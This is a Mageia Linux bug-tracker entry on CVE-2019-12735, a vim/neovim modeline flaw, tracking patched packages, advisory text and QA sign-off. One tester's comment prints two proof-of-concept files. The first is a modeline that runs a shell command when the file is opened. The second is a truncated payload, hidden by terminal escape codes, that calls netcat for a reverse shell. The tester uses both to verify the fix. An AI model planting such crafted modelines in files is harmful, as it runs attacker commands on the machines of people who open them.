Bug 24929 - vim, neovim new security issue CVE-2019-12735
Summary: vim, neovim new security issue CVE-2019-12735
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 7
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
Whiteboard: MGA7-64-OK
Keywords: advisory, validated_update
Depends on:
Reported: 2019-06-06 14:20 CEST by David Walser
Modified: 2020-02-13 11:50 CET (History)
10 users (show)

See Also:
Source RPM: vim-8.1.1048-1.mga7.src.rpm, neovim-0.3.5-1.mga7.src.rpm
Status comment:


Description David Walser 2019-06-06 14:20:11 CEST
A security issue fixed upstream in vim and neovim has been announced:

The issue is fixed upstream in vim 8.1.1365 and neovim 0.3.6.

Mageia 6 and Mageia 7 are also affected.
David Walser 2019-06-06 14:20:20 CEST

Whiteboard: (none) => MGA7TOO, MGA6TOO

Comment 1 Marja Van Waes 2019-06-07 07:42:54 CEST
Assigning to the neovim maintainer, because he might have more time than the vim maintainer.

CC'ing the vim maintainer.

CC: (none) => marja11, thierry.vignaud
Assignee: bugsquad => smelror

Comment 2 Stig-Ørjan Smelror 2019-06-07 10:15:11 CEST
Neovim 0.3.7 pushed to updates_testing
Comment 3 David Walser 2019-06-27 20:26:25 CEST
RedHat has issued an advisory for vim on June 26:
Comment 4 Stig-Ørjan Smelror 2019-07-04 19:33:48 CEST

Neovim has been updated to fix a security issue.

CVE-2019-12735: getchar.c in Neovim before 0.3.6 allows remote attackers to execute arbitrary OS commands via the :source! command in a modeline, as demonstrated by assert_fails or nvim_input in Neovim.



Uploaded to core/updates_testing


from neovim-0.3.7-1.mga7.src.rpm
Stig-Ørjan Smelror 2019-07-04 19:34:02 CEST

Assignee: smelror => qa-bugs

Comment 5 David Walser 2019-07-04 20:07:02 CEST
vim needs to be fixed too.

Version: Cauldron => 7
Whiteboard: MGA7TOO, MGA6TOO => MGA6TOO
Assignee: qa-bugs => thierry.vignaud
CC: (none) => qa-bugs, smelror

Comment 6 David Walser 2019-08-11 22:33:21 CEST
Debian has issued an advisory for this on June 13:

Ubuntu has issued advisories for this on June 11:

Severity: normal => major

Comment 7 David Walser 2019-08-12 00:39:12 CEST
Debian has issued an advisory for this on July 23:
Comment 8 David Walser 2019-12-19 22:57:51 CET
Fedora has issued an advisory for vim on June 6:

We are still missing a vim update for Mageia 7.  Someone please take care of it.

CC: (none) => pkg-bugs

David Walser 2020-01-14 18:09:23 CET

Status comment: (none) => neovim has been updated, vim update still needed

Comment 9 Mike Rambo 2020-02-10 21:49:55 CET
Patched package uploaded for Mageia 7.


Updated vim package fixes security vulnerabilities:

It was discovered that Vim before 8.1.1365 and Neovim before 0.3.6 did not restrict the `:source!` command when executed in a sandbox. This allows remote attackers to take advantage of the modeline feature to inject  arbitrary commands when a specially crafted file is opened (CVE-2019-12735).


Updated packages in core/updates_testing:

from vim-8.1.1048-1.1.mga7.src.rpm

Whiteboard: MGA6TOO => (none)
CC: (none) => mrambo
Assignee: thierry.vignaud => qa-bugs

Comment 10 David Walser 2020-02-10 22:55:22 CET
Thanks.  We'll need to clarify in the advisory that this update includes both vim and neovim.

Status comment: neovim has been updated, vim update still needed => (none)

Comment 11 Len Lawrence 2020-02-11 11:07:15 CET
mga7, x86_64

$ rpm -qa | grep neovim

Two PoC available.

$ cat poc.txt
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

$ cat shell.txt
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 999!

*Before update*
This test demonstrates the vulnerability.
$ nvim poc.txt
<This executes the 'uname -a' command>

Linux canopus 5.1.14-desktop-1.mga7 #1 SMP Sat Jun 22 10:35:14 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Press ENTER or type command to continue

$ nvim shell.txt
This starts a normal vi session without the reverse terminal and system call.  
$ grep nomodelines /usr/share/vim/vimrc
returns nothing.  nomodelines is supposed to prevent the use of custom modelines in files to be edited by vim.  So in the default configuration file  that protection is not there.  However, the exploit is not delivered either, which implies that the vulnerability has already been patched.

*After update*
- neovim-0.3.7-1.mga7.x86_64
- neovim-data-0.3.7-1.mga7.noarch
- vim-common-8.1.1048-1.1.mga7.x86_64
- vim-enhanced-8.1.1048-1.1.mga7.x86_64
- vim-minimal-8.1.1048-1.1.mga7.x86_64
- vim-X11-8.1.1048-1.1.mga7.x86_64

$ nvim shell.txt
Normal session, as before.
$ nvim poc.txt
Normal session, so the problem has been fixed.

For good measure, running these two tests with the vim, vi variants returned the same results.

Finished off this report using nvim.  *vim looks OK.

CC: (none) => tarazed25
Whiteboard: (none) => MGA7-64-OK

Comment 12 Thomas Andrews 2020-02-11 21:36:03 CET
Validating. Advisory information in Comment 4, Comment 9, and Comment 10.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs

Thomas Backlund 2020-02-13 11:04:25 CET

CC: (none) => tmb
Keywords: (none) => advisory

Comment 13 Mageia Robot 2020-02-13 11:50:16 CET
An update for this issue has been pushed to the Mageia Updates repository.


Resolution: (none) => FIXED

Note You need to log in before you can comment on or make changes to this bug.